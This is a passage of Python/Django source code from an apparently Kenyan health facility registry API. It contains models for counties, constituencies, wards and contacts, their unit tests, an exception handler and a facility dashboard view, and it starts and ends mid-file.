CommunityHealthUnitContact, health_unit=chu, contact=contact_1)
chu_contact_2 = mommy.make(
CommunityHealthUnitContact, health_unit=chu, contact=contact_2)
contacts = [
{
"contact_type": str(contact_type.id),
"contact": "3852357254",
"contact_type_name": contact_type.name,
"contact_id": str(contact_1.id),
"id": str(chu_contact_1.id)
},
{
"contact_type": str(contact_type_2.id),
"contact": "385235725",
"contact_type_name": contact_type_2.name,
"contact_id": str(contact_2.id),
"id": str(chu_contact_2.id)
}
]
data = {
'contacts': contacts
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthUnitContact.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNotNone(update.contacts)
self.assertIsNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthUnitContact.objects.count())
self.assertEquals(2, CommunityHealthUnitContact.objects.filter(
health_unit=chu_refetched).count())
```
#### File: common/models/model_declarations.py
```python
import logging
import reversion
import json
from django.db import models
from django.conf import settings
from django.utils import encoding, timezone
from rest_framework.exceptions import ValidationError
from ..fields import SequenceField
from .base import AbstractBase, SequenceMixin
LOGGER = logging.getLogger(__file__)
ERROR_TYPES = (
(
'SEARCH_INDEXING_ERROR',
'An error that occurred during search indexing'
),
(
'SEND_EMAIL_ERROR',
'An error that occurs when sending a user email'
)
)
class UserAdminAreaLinkageMixin(object):
def should_update_user_area(self, *args, **kwargs):
"""
Ensure that a user is assigned to a given admin area only once.
To remove the user from the area, deactivate the record; to link
the user back to the admin area, activate the record again.
"""
try:
if kwargs.pop('field_name', None) == 'constituency':
old_obj = self.__class__.objects.get(
user=self.user, constituency=self.constituency)
else:
old_obj = self.__class__.objects.get(
user=self.user, county=self.county)
active_list = [old_obj.active, self.active]
return active_list.count(True) == 1
except self.__class__.DoesNotExist:
# the record is being created for the first time
return True
@reversion.register
@encoding.python_2_unicode_compatible
class ContactType(AbstractBase):
"""
Captures the different types of contacts that we have in the real world.
The most common contacts are email, phone numbers, land-line etc.
"""
name = models.CharField(
max_length=100, unique=True,
help_text="A short name, preferably 6 characters long, "
"representing a certain type of contact e.g EMAIL")
description = models.TextField(
null=True, blank=True,
help_text='A brief description of the contact type.')
def __str__(self):
return self.name
@reversion.register(follow=['contact_type'])
@encoding.python_2_unicode_compatible
class Contact(AbstractBase):
"""
Holds ways in which entities can communicate.
The communication channels are not restricted, provided that all
parties willing to communicate are able to do so. They may include
emails, phone numbers, landlines, etc.
"""
contact = models.CharField(
max_length=100,
help_text="The actual contact of the person e.g <EMAIL>,"
" 07XXYYYZZZ")
contact_type = models.ForeignKey(
ContactType,
help_text="The type of contact that the given contact is e.g email"
" or phone number",
on_delete=models.PROTECT)
def __str__(self):
return "{}: {}".format(self.contact_type.name, self.contact)
class Meta(AbstractBase.Meta):
unique_together = ('contact', 'contact_type')
class AdministrativeUnitBase(SequenceMixin, AbstractBase):
"""Base class for County, Constituency and Ward"""
name = models.CharField(
max_length=100,
help_text="Name of the administrative unit e.g Nairobi")
code = SequenceField(
unique=True,
help_text="A unique_code 4 digit number representing the region.")
def save(self, *args, **kwargs):
if not self.code:
self.code = self.generate_next_code_sequence()
super(AdministrativeUnitBase, self).save(*args, **kwargs)
class Meta(AbstractBase.Meta):
abstract = True
def _lookup_facility_coordinates(area_boundary):
"""A helper used by the County, Constituency and Ward classes"""
from mfl_gis.models import FacilityCoordinates
facility_coordinates = FacilityCoordinates.objects.filter(
coordinates__contained=area_boundary.mpoly
) if area_boundary and area_boundary.mpoly else []
return [
{
"name": facility_coordinate.facility.name,
"geometry": json.loads(facility_coordinate.coordinates.geojson)
}
for facility_coordinate in facility_coordinates
]
@reversion.register
@encoding.python_2_unicode_compatible
class County(AdministrativeUnitBase):
"""
This is the largest administrative/political division in Kenya.
Kenya is divided in 47 different counties.
Code generation is handled by the custom save method in
AdministrativeUnitBase
"""
@property
def facility_coordinates(self):
"""Look up the facilities that are in this unit's boundaries"""
try:
return _lookup_facility_coordinates(self.countyboundary)
except: # Handling RelatedObjectDoesNotExist is a little funky
LOGGER.info('No boundaries found for {}'.format(self))
return _lookup_facility_coordinates(None)
@property
def county_bound(self):
from mfl_gis.models import CountyBoundary
unit = CountyBoundary.objects.filter(area=self)
return unit[0].bound if len(unit) else {}
def __str__(self):
return self.name
class Meta(AdministrativeUnitBase.Meta):
verbose_name_plural = 'counties'
@reversion.register(follow=['county'])
@encoding.python_2_unicode_compatible
class Constituency(AdministrativeUnitBase):
"""
Counties in Kenya are divided into constituencies.
A Constituency is a political sub division of a county.
There are 290 constituencies in total.
In most cases they coincide with sub counties.
Code generation is handled by the custom save method in
AdministrativeUnitBase
"""
county = models.ForeignKey(
County,
help_text="Name of the county where the constituency is located",
on_delete=models.PROTECT)
def __str__(self):
return self.name
@property
def constituency_bound(self):
from mfl_gis.models import ConstituencyBoundary
unit = ConstituencyBoundary.objects.filter(area=self)
return unit[0].bound if len(unit) else {}
class Meta(AdministrativeUnitBase.Meta):
verbose_name_plural = 'constituencies'
unique_together = ('name', 'county')
@reversion.register(follow=['county'])
@encoding.python_2_unicode_compatible
class SubCounty(AdministrativeUnitBase):
"""
A county can be sub divided into sub counties.
The sub-counties do not necessarily map to constituencies
"""
county = models.ForeignKey(County, on_delete=models.PROTECT)
def __str__(self):
return self.name
@reversion.register(follow=['constituency'])
@encoding.python_2_unicode_compatible
class Ward(AdministrativeUnitBase):
"""
The Kenyan counties are sub divided into wards.
This is an administrative sub-division of the counties.
A constituency can have one or more wards.
In most cases the sub county is also the constituency.
Code generation is handled by the custom save method in
AdministrativeUnitBase
"""
constituency = models.ForeignKey(
Constituency,
help_text="The constituency where the ward is located.",
on_delete=models.PROTECT)
sub_county = models.ForeignKey(
SubCounty, null=True, blank=True,
help_text='The sub-county where the ward is located',
on_delete=models.PROTECT)
def __str__(self):
return self.name
@property
def county(self):
return self.constituency.county
@property
def facility_coordinates(self):
"""Look up the facilities that are in this unit's boundaries"""
try:
return _lookup_facility_coordinates(self.wardboundary)
except: # Handling RelatedObjectDoesNotExist is a little funky
LOGGER.info('No boundaries found for {}'.format(self))
return _lookup_facility_coordinates(None)
def validate_county(self):
if self.sub_county:
if not self.sub_county.county == self.constituency.county:
raise ValidationError(
{
"sub_county": [
"Ensure the sub-county and the constituency "
"are in the same county"
]
}
)
def clean(self, *args, **kwargs):
super(Ward, self).clean(*args, **kwargs)
self.validate_county()
@reversion.register(follow=['user', 'county'])
@encoding.python_2_unicode_compatible
class UserCounty(UserAdminAreaLinkageMixin, AbstractBase):
"""
Will store a record of the counties that a user has been in-charge of.
A user can only be in-charge of only one county at a time.
"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name='user_counties',
on_delete=models.PROTECT)
county = models.ForeignKey(County, on_delete=models.PROTECT)
def __str__(self):
return "{}: {}".format(self.user, self.county)
def clean(self, *args, **kwargs):
super(UserCounty, self).clean(*args, **kwargs)
def save(self, *args, **kwargs):
self.full_clean(exclude=None)
super(UserCounty, self).save(*args, **kwargs) if \
self.should_update_user_area(field_name='county') else None
class Meta(AbstractBase.Meta):
verbose_name_plural = 'user_counties'
@reversion.register(follow=['user', 'contact'])
@encoding.python_2_unicode_compatible
class UserContact(AbstractBase):
"""
Stores a user's contacts.
"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
related_name='user_contacts', on_delete=models.PROTECT)
contact = models.ForeignKey(Contact)
def __str__(self):
return "{}: ({})".format(self.user, self.contact)
def validate_user_linked_to_a_certain_contact_once(self):
"""
Ensures that user contacts are not duplicated
"""
user_contact_instance_count = self.__class__.objects.filter(
user=self.user, contact=self.contact).count()
if user_contact_instance_count > 0 and not self.deleted:
msg = "The user contact {0} is already added to the user".format(
self.contact.contact)
raise ValidationError(
{
"contact": [msg]
})
def clean(self, *args, **kwargs):
super(UserContact, self).clean(*args, **kwargs)
self.validate_user_linked_to_a_certain_contact_once()
@reversion.register(follow=['user', 'constituency'])
@encoding.python_2_unicode_compatible
class UserConstituency(UserAdminAreaLinkageMixin, AbstractBase):
user = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name='user_constituencies')
constituency = models.ForeignKey(Constituency)
def validate_constituency_county_in_creator_county(self):
error = {
"constituency": [
"Users created must be in the administrators "
"county or sub county"
]
}
nat_user = self.created_by.is_national or self.updated_by.is_national
if self.created_by.constituency:
if self.constituency.county != self.created_by.constituency.county:
raise ValidationError(error)
elif (self.constituency.county != self.created_by.county and not
nat_user):
raise ValidationError(error)
def clean(self, *args, **kwargs):
self.validate_constituency_county_in_creator_county()
def __str__(self):
return "{}: {}".format(self.user, self.constituency)
def save(self, *args, **kwargs):
self.full_clean(exclude=None)
super(UserConstituency, self).save(*args, **kwargs) if \
self.should_update_user_area(field_name='constituency') else None
class Meta(object):
verbose_name_plural = 'user constituencies'
@reversion.register
@encoding.python_2_unicode_compatible
class Town(AbstractBase):
name = models.CharField(
max_length=255, unique=True, null=True, blank=True,
help_text="Name of the town")
def __str__(self):
return self.name
@reversion.register(follow=['town', ])
@encoding.python_2_unicode_compatible
class PhysicalAddress(AbstractBase):
"""
The physical properties of a facility.
These include the plot number and the nearest landmark. This
information, in conjunction with GPS codes, is useful in locating
the facility.
"""
town = models.ForeignKey(
Town, null=True, blank=True,
help_text="The town where the entity is located e.g Nakuru")
nearest_landmark = models.TextField(
null=True, blank=True,
help_text="well-known physical features /structure that can be used to"
" simplify directions to a given place. e.g town market or village ")
plot_number = models.CharField(
max_length=100, null=True, blank=True,
help_text="This is the same number found on the title deeds of the"
"piece of land on which this facility is located")
location_desc = models.TextField(
null=True, blank=True,
help_text="This field allows a more detailed description of "
"the location")
def __str__(self):
return self.location_desc
class Meta(AbstractBase.Meta):
verbose_name_plural = 'physical addresses'
@reversion.register
@encoding.python_2_unicode_compatible
class DocumentUpload(AbstractBase):
name = models.CharField(max_length=255, unique=True)
description = models.TextField(null=True, blank=True)
fyl = models.FileField()
def __str__(self):
return self.name
@reversion.register
@encoding.python_2_unicode_compatible
class ErrorQueue(models.Model):
"""
A model to store errors that occur when processing data
"""
object_pk = models.CharField(max_length=100, null=True, blank=True)
app_label = models.CharField(max_length=100, null=True, blank=True)
model_name = models.CharField(max_length=100, null=True, blank=True)
resolved = models.BooleanField(default=False)
retries = models.IntegerField(default=0)
except_message = models.TextField(null=True, blank=True)
error_type = models.CharField(choices=ERROR_TYPES, max_length=100)
created = models.DateTimeField(default=timezone.now)
class Meta(object):
unique_together = ('object_pk', 'app_label', 'model_name')
ordering = ('-created', )
def __str__(self):
return "{} - {} - {}".format(
self.object_pk, self.app_label, self.model_name)
class UserSubCounty(AbstractBase):
"""
Link a user to a sub-county
"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name='user_sub_counties')
sub_county = models.ForeignKey(SubCounty, on_delete=models.PROTECT)
def __str__(self):
return "{0} - {1}".format(
self.user.email, self.sub_county.name)
```
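The `should_update_user_area` check above boils down to: allow the save only when exactly one of the stored record and the incoming record is active, i.e. the call either deactivates an active link or re-activates a dormant one. A tiny standalone illustration of that rule (no Django involved):
```python
def should_update(old_active, new_active):
    """Mirror of the `active_list.count(True) == 1` rule."""
    return [old_active, new_active].count(True) == 1

assert should_update(True, False) is True    # deactivate an active link
assert should_update(False, True) is True    # re-activate a dormant link
assert should_update(True, True) is False    # already active: no duplicate link
assert should_update(False, False) is False  # already inactive: nothing to do
```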
#### File: common/tests/test_models.py
```python
from datetime import timedelta, datetime
from django.test import TestCase
from django.contrib.auth import get_user_model
from rest_framework.exceptions import ValidationError
from django.conf import settings
from django.utils import timezone
from model_mommy import mommy
from ..models import (
Contact,
County,
Ward,
Constituency,
Town,
ContactType,
PhysicalAddress,
UserCounty,
UserContact,
UserConstituency,
SubCounty,
ErrorQueue
)
from facilities.models import RegulationStatus
class AbstractBaseModelTest(TestCase):
def setUp(self):
self.leo = timezone.now()
self.jana = timezone.now() - timedelta(days=1)
self.juzi = timezone.now() - timedelta(days=2)
self.user_1 = mommy.make(settings.AUTH_USER_MODEL)
self.user_2 = mommy.make(settings.AUTH_USER_MODEL)
def test_validate_updated_date_greater_than_created(self):
fake = ContactType(created=self.leo, updated=self.jana)
with self.assertRaises(ValidationError) as ve:
fake.validate_updated_date_greater_than_created()
self.assertTrue(
'The updated date cannot be less than the created date'
in ve.exception.detail)
def test_preserve_created_and_created_by(self):
# Create a new instance
fake = mommy.make(ContactType, created=self.jana, updated=self.leo,
created_by=self.user_1, updated_by=self.user_1)
# Switch the create
fake.created = self.juzi
fake.save()
self.assertEqual(self.jana, fake.created)
# Switch created_by
fake.created_by = self.user_2
fake.updated_by = self.user_2
fake.save()
self.assertEqual(self.user_1.id, fake.created_by.id)
self.assertEqual(self.user_2.id, fake.updated_by.id)
def test_delete_override(self):
bp_type = mommy.make(ContactType, created=timezone.now(),
updated=timezone.now())
bp_type.delete()
with self.assertRaises(ContactType.DoesNotExist):
self.assertTrue(ContactType.objects.get(
pk=bp_type.id))
assert ContactType.everything.get(pk=bp_type.id)
def test_timezone(self):
naive_datetime = datetime.now()
instance = mommy.make(ContactType)
instance.updated = naive_datetime
with self.assertRaises(ValidationError):
instance.save()
naive_after_object_is_saved = datetime.now()
instance.updated = naive_after_object_is_saved
instance.save()
self.assertTrue(timezone.is_aware(instance.updated))
# Test that we don't need to make created timezone aware
# It is already timezone aware
self.assertTrue(timezone.is_aware(instance.created))
created_naive_datetime = datetime.now()
instance.create = created_naive_datetime # This should not even update
instance.save()
self.assertTrue(timezone.is_aware(instance.created))
class BaseTestCase(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_superuser(
email='<EMAIL>',
first_name='Test',
employee_number='2124124124',
password='<PASSWORD>',
is_national=True
)
self.default_regulation_status = mommy.make(
RegulationStatus, name="Pending Regulation", is_default=True)
super(BaseTestCase, self).setUp()
def inject_audit_fields(self, data):
data["created_by"] = self.user
data["updated_by"] = self.user
data["created"] = timezone.now()
data["updated"] = timezone.now()
return data
class TestContactModel(BaseTestCase):
def test_save_contact(self):
contact_type = mommy.make(ContactType, name='EMAIL')
contact_data = {
"contact": "<EMAIL>",
"contact_type": contact_type
}
contact_data = self.inject_audit_fields(contact_data)
Contact.objects.create(**contact_data)
self.assertEquals(1, Contact.objects.count())
def test_save_model_with_id(self):
contact_type = mommy.make(ContactType)
Contact.objects.create(
pk='1a049a8a-6e1f-4427-9098-a779cf9f63fa',
contact='375818195',
contact_type=contact_type)
self.assertEquals(1, Contact.objects.count())
class TestCountyModel(BaseTestCase):
def test_save_county(self):
county_data = {
"name": "WAJIR"
}
county_data = self.inject_audit_fields(county_data)
county = County.objects.create(**county_data)
self.assertEquals(1, County.objects.count())
self.assertIsNotNone(county.code)
def test_county_code_seq(self):
# make code None so that model mommy does not supply it
county = mommy.make(County, code=None)
county_2 = mommy.make(County, code=None)
county_2_code = int(county.code) + 1
self.assertEquals(county_2_code, county_2.code)
def test_lookup_facility_coordinates(self):
county = mommy.make(County)
self.assertEqual(
county.facility_coordinates,
[]
)
def test_county_bound(self):
county = mommy.make(County)
self.assertEqual(
county.county_bound,
{}
)
class TestConstituencyModel(BaseTestCase):
def setUp(self):
super(TestConstituencyModel, self).setUp()
self.county = County.objects.create(
updated_by=self.user, created_by=self.user,
name='county')
def test_save_constituency(self):
constituency_data = {
"name": "KAPSA",
"county": self.county
}
constituency_data = self.inject_audit_fields(constituency_data)
constituency = Constituency.objects.create(**constituency_data)
self.assertEquals(1, Constituency.objects.count())
self.assertIsNotNone(constituency.code)
def test_constituency_code_sequence(self):
constituency_1 = mommy.make(Constituency, code=None)
constituency_2 = mommy.make(Constituency, code=None)
constituency_2_code = int(constituency_1.code) + 1
self.assertEquals(constituency_2_code, int(constituency_2.code))
def test_consituency_bound(self):
const = mommy.make(Constituency)
self.assertEqual(
const.constituency_bound,
{}
)
class TestWardModel(BaseTestCase):
def setUp(self):
super(TestWardModel, self).setUp()
county = mommy.make(County)
self.constituency = Constituency.objects.create(
created_by=self.user, updated_by=self.user,
name='constituency', county=county)
def test_save_ward(self):
data = {
"name": "KAPSA",
"constituency": self.constituency
}
data = self.inject_audit_fields(data)
ward = Ward.objects.create(**data)
self.assertEquals(1, Ward.objects.count())
self.assertIsNotNone(ward.code)
def test_sub_county_code_seq(self):
sub_county_1 = mommy.make(Ward, code=None)
sub_county_2 = mommy.make(Ward, code=None)
sub_county_2_code = int(sub_county_1.code) + 1
self.assertEquals(sub_county_2_code, int(sub_county_2.code))
def test_get_county(self):
county = mommy.make(County)
constituency = mommy.make(Constituency, county=county)
ward = mommy.make(Ward, constituency=constituency)
self.assertEquals(county, ward.county)
def test_ward_county(self):
# test that the sub-county and the constituency must belong
# to the same county
sub_county = mommy.make(SubCounty)
const = mommy.make(Constituency)
with self.assertRaises(ValidationError):
mommy.make(Ward, constituency=const, sub_county=sub_county)
class TestPhysicalAddress(BaseTestCase):
def test_save(self):
data = {
"town": mommy.make(Town, name="Nairobi"),
"nearest_landmark": "",
"plot_number": "35135"
}
data = self.inject_audit_fields(data)
PhysicalAddress.objects.create(**data)
self.assertEquals(1, PhysicalAddress.objects.count())
class TestUserCountyModel(BaseTestCase):
def test_save(self):
user = mommy.make(get_user_model())
county = mommy.make(County)
data = {
"user": user,
"county": county
}
UserCounty.objects.create(**data)
self.assertEquals(1, UserCounty.objects.count())
def test_user_linked_to_a_county_once(self):
user = mommy.make(get_user_model())
county = mommy.make(County)
# First time should save with no issue
user_county_rec = mommy.make(UserCounty, user=user, county=county)
# Deactivating the record should have no incident
user_county_rec.active = False
user_county_rec.save()
self.assertFalse(UserCounty.objects.get(user=user).active)
user_county_rec.active = True
user_county_rec.save()
self.assertTrue(UserCounty.objects.get(user=user).active)
class TestUserContactModel(BaseTestCase):
def test_save(self):
user = mommy.make(get_user_model())
contact = mommy.make(Contact)
data = {
"user": user,
"contact": contact
}
data = self.inject_audit_fields(data)
UserContact.objects.create(**data)
self.assertEquals(1, UserContact.objects.count())
def test_user_and_contact_unique(self):
contact = mommy.make(Contact)
user = mommy.make(get_user_model())
mommy.make(UserContact, user=user, contact=contact)
with self.assertRaises(ValidationError):
mommy.make(UserContact, user=user, contact=contact)
def test_user_contact_deletion(self):
contact = mommy.make(Contact)
user = mommy.make(get_user_model())
user_contact = mommy.make(UserContact, user=user, contact=contact)
self.assertEquals(1, UserContact.objects.filter(user=user).count())
user_contact.delete()
self.assertEquals(0, UserContact.objects.filter(user=user).count())
class TestUserConstituencyModel(BaseTestCase):
def test_save(self):
user = mommy.make(get_user_model())
county = mommy.make(County)
const = mommy.make(Constituency, county=county)
creator_user = mommy.make(get_user_model())
mommy.make(
UserCounty, county=county, user=creator_user)
mommy.make(
UserConstituency, constituency=const, user=user,
created_by=creator_user)
self.assertEquals(1, UserConstituency.objects.count())
def test_validator_constituency_in_creators_county(self):
county = mommy.make(County)
county_2 = mommy.make(County)
const = mommy.make(Constituency, county=county)
const_2 = mommy.make(Constituency, county=county_2)
user = mommy.make(get_user_model())
user_2 = mommy.make(get_user_model())
creator_user = mommy.make(get_user_model())
mommy.make(UserCounty, county=county, user=creator_user)
# should save without incidence
mommy.make(
UserConstituency, user=user, constituency=const,
created_by=creator_user
)
self.assertEquals(1, UserConstituency.objects.count())
# should raise a validation error
with self.assertRaises(ValidationError):
mommy.make(UserConstituency, user=user_2, constituency=const_2)
# test user constituencies
self.assertEquals(const, user.constituency)
def test_user_created_is_in_the_creators_sub_county(self):
county = mommy.make(County)
constituency = mommy.make(Constituency, county=county)
constituency_2 = mommy.make(Constituency)
user = mommy.make(get_user_model())
user_2 = mommy.make(get_user_model())
user_3 = mommy.make(get_user_model())
mommy.make(UserCounty, county=county, user=user)
mommy.make(
UserConstituency, constituency=constituency,
user=user_2, created_by=user, updated_by=user)
# the user being created and the creating user are not in
# the same constituency
with self.assertRaises(ValidationError):
mommy.make(
UserConstituency, constituency=constituency_2,
user=user_3, created_by=user_2, updated_by=user_2)
def test_user_linked_to_a_constituency_once(self):
user = mommy.make(get_user_model())
county = mommy.make(County)
const = mommy.make(Constituency, county=county)
creator_user = mommy.make(get_user_model())
mommy.make(UserCounty, user=creator_user, county=county)
# First time should save with no issue
user_const_rec = mommy.make(
UserConstituency, user=user, constituency=const,
created_by=creator_user, updated_by=creator_user)
        # Deactivating the record should save without incident
user_const_rec.active = False
user_const_rec.save()
self.assertFalse(UserConstituency.objects.get(user=user).active)
user_const_rec.active = True
user_const_rec.save()
self.assertTrue(UserConstituency.objects.get(user=user).active)
class TestSubCounty(TestCase):
def test_save(self):
mommy.make(SubCounty)
self.assertEquals(1, SubCounty.objects.count())
class TestErrorQueue(TestCase):
def test_save(self):
mommy.make(ErrorQueue)
self.assertEquals(1, ErrorQueue.objects.count())
def test_representation(self):
error = mommy.make(
ErrorQueue,
object_pk='1',
app_label='users',
model_name='MflUser')
string_rep = "1 - users - MflUser"
self.assertEquals(string_rep, error.__str__())
```
#### File: common/utilities/views.py
```python
from rest_framework import generics
class CustomDestroyModelMixin(object):
def perform_destroy(self, instance):
instance.deleted = True
instance.save()
class CustomRetrieveUpdateDestroyView(
CustomDestroyModelMixin, generics.RetrieveUpdateDestroyAPIView):
pass
```
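The mixin above swaps DRF's hard delete for a soft delete by flagging the instance instead of removing the row. A minimal usage sketch follows; `Contact` and `ContactSerializer` are illustrative stand-ins, and the sketch assumes the model exposes the `deleted` flag that `perform_destroy` sets.
```python
# Hypothetical endpoint wiring for the soft-delete view above.
# Contact / ContactSerializer are placeholders, not project code.
from rest_framework import serializers

from common.models import Contact
from common.utilities.views import CustomRetrieveUpdateDestroyView


class ContactSerializer(serializers.ModelSerializer):

    class Meta:
        model = Contact
        fields = '__all__'


class ContactDetailView(CustomRetrieveUpdateDestroyView):
    # DELETE now marks the record as deleted instead of removing the row
    queryset = Contact.objects.all()
    serializer_class = ContactSerializer
```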
#### File: mfl_api/config/__init__.py
```python
def get_version(v):
"""
Generate a PEP386 compliant version
Stolen from django.utils.version.get_version
:param v tuple: A five part tuple indicating the version
:returns str: Compliant version
"""
assert isinstance(v, tuple)
assert len(v) == 5
assert v[3] in ('alpha', 'beta', 'rc', 'final')
parts = 2 if v[2] == 0 else 3
main = '.'.join(str(i) for i in v[:parts])
sub = ''
if v[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[v[3]] + str(v[4])
return str(main + sub)
VERSION = (2, 0, 0, 'alpha', 8)
__version__ = get_version(VERSION)
try:
from settings import * # noqa
except ImportError: # Will occur on first install
pass # NOQA
```
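For reference, a few concrete inputs and the strings `get_version` produces for them, derived directly from the function above; the import assumes the package is importable as `config`.
```python
# Worked examples for get_version; comments show the returned strings.
from config import get_version

print(get_version((2, 0, 0, 'alpha', 8)))   # '2.0a8'   (patch is 0, so two parts)
print(get_version((2, 1, 3, 'beta', 1)))    # '2.1.3b1'
print(get_version((1, 4, 0, 'final', 0)))   # '1.4'     ('final' adds no suffix)
```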
#### File: mfl_api/exception_handler/handler.py
```python
from django.core.exceptions import ValidationError
from rest_framework.response import Response
from rest_framework.views import exception_handler
from rest_framework import status
import logging
LOGGER = logging.getLogger(__name__)
def custom_exception_handler(exc, context):
"""
    Django REST Framework fails silently for the errors it doesn't handle.
    This handler will bubble up errors that are not handled by DRF.
    Users of this handler will have to catch those errors themselves.
    ..NOTE : ValidationErrors, especially Django model errors, are context
    specific, hence handling them here would provide a generic message that
    won't be helpful for that context; they are therefore better handled by
    the users themselves.
"""
response = exception_handler(exc, context)
if response:
return response
if isinstance(exc, ValidationError):
LOGGER.error(exc)
return Response(exc, status=status.HTTP_400_BAD_REQUEST)
else:
data = {'detail': ['Server Error: {}'.format(exc.__class__.__name__)]}
        # Keep this; the full traceback is invaluable when unexpected errors occur
import traceback
traceback.print_exc()
LOGGER.error(exc)
return Response(data, status=500)
```
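For the handler to take effect, DRF must be pointed at it from the Django settings. A sketch of that wiring, assuming the dotted path matches the file header above; the rest of the project's `REST_FRAMEWORK` options are omitted.
```python
# settings.py sketch: register the custom exception handler with DRF.
REST_FRAMEWORK = {
    'EXCEPTION_HANDLER': 'exception_handler.handler.custom_exception_handler',
    # ... the project's other REST_FRAMEWORK options ...
}
```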
#### File: facilities/views/facility_dashboard.py
```python
from datetime import timedelta
from django.utils import timezone
from django.db.models import Q
from rest_framework.views import APIView, Response
from common.models import County, SubCounty, Ward
from chul.models import CommunityHealthUnit
from ..models import (
OwnerType,
Owner,
FacilityStatus,
FacilityType,
Facility
)
from ..views import QuerysetFilterMixin
class DashBoard(QuerysetFilterMixin, APIView):
queryset = Facility.objects.all()
def get_chu_count_in_county_summary(self, county):
return CommunityHealthUnit.objects.filter(
facility__ward__sub_county__county=county).count()
def get_chu_count_in_constituency_summary(self, const):
return CommunityHealthUnit.objects.filter(
facility__ward__sub_county=const).count()
def get_chu_count_in_ward_summary(self, ward):
return CommunityHealthUnit.objects.filter(
facility__ward=ward).count()
def get_facility_county_summary(self):
counties = County.objects.all()
facility_county_summary = {}
for county in counties:
facility_county_count = self.get_queryset().filter(
ward__sub_county__county=county).count()
facility_county_summary[str(county.name)] = facility_county_count
top_10_counties = sorted(
facility_county_summary.items(),
            key=lambda x: x[1], reverse=True)[0:20]
top_10_counties_summary = []
for item in top_10_counties:
county = County.objects.get(name=item[0])
chu_count = self.get_chu_count_in_county_summary(county)
top_10_counties_summary.append(
{
"name": item[0],
"count": item[1],
"chu_count": chu_count
})
return top_10_counties_summary if self.request.user.is_national else []
def get_facility_constituency_summary(self):
constituencies = SubCounty.objects.filter(
county=self.request.user.county)
constituencies = constituencies if self.request.user.county else []
facility_constituency_summary = {}
for const in constituencies:
facility_const_count = self.get_queryset().filter(
ward__sub_county=const).count()
facility_constituency_summary[
str(const.name)] = facility_const_count
top_10_consts = sorted(
facility_constituency_summary.items(),
key=lambda x: x[1], reverse=True)[0:20]
top_10_consts_summary = []
for item in top_10_consts:
const = SubCounty.objects.get(name=item[0])
chu_count = self.get_chu_count_in_constituency_summary(const)
top_10_consts_summary.append(
{
"name": item[0],
"count": item[1],
"chu_count": chu_count
})
return top_10_consts_summary
def get_facility_ward_summary(self):
wards = Ward.objects.filter(
sub_county=self.request.user.sub_county) \
if self.request.user.sub_county else []
facility_ward_summary = {}
for ward in wards:
facility_ward_count = self.get_queryset().filter(
ward=ward).count()
facility_ward_summary[
str(ward.name + "|" + str(ward.code))] = facility_ward_count
top_10_wards = sorted(
facility_ward_summary.items(),
key=lambda x: x[1], reverse=True)[0:20]
top_10_wards_summary = []
for item in top_10_wards:
ward = Ward.objects.get(code=item[0].split('|')[1])
chu_count = self.get_chu_count_in_ward_summary(ward)
top_10_wards_summary.append(
{
"name": item[0].split('|')[0],
"count": item[1],
"chu_count": chu_count
})
return top_10_wards_summary
def get_facility_type_summary(self):
facility_types = FacilityType.objects.all()
facility_type_summary = []
for facility_type in facility_types:
facility_type_summary.append(
{
"name": str(facility_type.name),
"count": self.get_queryset().filter(
facility_type=facility_type).count()
})
facility_type_summary_sorted = sorted(
facility_type_summary,
            key=lambda x: x["count"], reverse=True)[0:5]
return facility_type_summary_sorted
def get_facility_owner_summary(self):
owners = Owner.objects.all()
facility_owners_summary = []
for owner in owners:
facility_owners_summary.append(
{
"name": owner.name,
"count": self.get_queryset().filter(
owner=owner).count()
})
return facility_owners_summary
def get_facility_status_summary(self):
statuses = FacilityStatus.objects.all()
status_summary = []
for status in statuses:
status_summary.append(
{
"name": status.name,
"count": self.get_queryset().filter(
operation_status=status).count()
})
return status_summary
def get_facility_owner_types_summary(self):
owner_types = OwnerType.objects.all()
owner_types_summary = []
for owner_type in owner_types:
owner_types_summary.append(
{
"name": owner_type.name,
"count": self.get_queryset().filter(
owner__owner_type=owner_type).count()
})
return owner_types_summary
def get_recently_created_facilities(self):
right_now = timezone.now()
last_week = self.request.query_params.get('last_week', None)
last_month = self.request.query_params.get('last_month', None)
last_three_months = self.request.query_params.get(
'last_three_months', None)
three_months_ago = right_now - timedelta(days=90)
if last_week:
weekly = right_now - timedelta(days=7)
return self.get_queryset().filter(
created__gte=weekly).count()
if last_month:
monthly = right_now - timedelta(days=30)
return self.get_queryset().filter(
created__gte=monthly).count()
if last_three_months:
return self.get_queryset().filter(
created__gte=three_months_ago).count()
return self.get_queryset().filter(
created__gte=three_months_ago).count()
def get_recently_created_chus(self):
right_now = timezone.now()
last_week = self.request.query_params.get('last_week', None)
last_month = self.request.query_params.get('last_month', None)
last_three_months = self.request.query_params.get(
'last_three_months', None)
three_months_ago = right_now - timedelta(days=90)
if last_week:
weekly = right_now - timedelta(days=7)
return CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset(),
created__gte=weekly).count()
if last_month:
monthly = right_now - timedelta(days=30)
return CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset(),
created__gte=monthly).count()
if last_three_months:
return CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset(),
date_established__gte=three_months_ago).count()
return CommunityHealthUnit.objects.filter(
facility__in=self.get_queryset(),
date_established__gte=three_months_ago).count()
def facilities_pending_approval_count(self):
updated_pending_approval = self.get_queryset().filter(has_edits=True)
newly_created = self.queryset.filter(approved=False, rejected=False)
return len(
list(set(list(updated_pending_approval) + list(newly_created)))
)
def get_chus_pending_approval(self):
"""
Get the number of CHUs pending approval
"""
return CommunityHealthUnit.objects.filter(
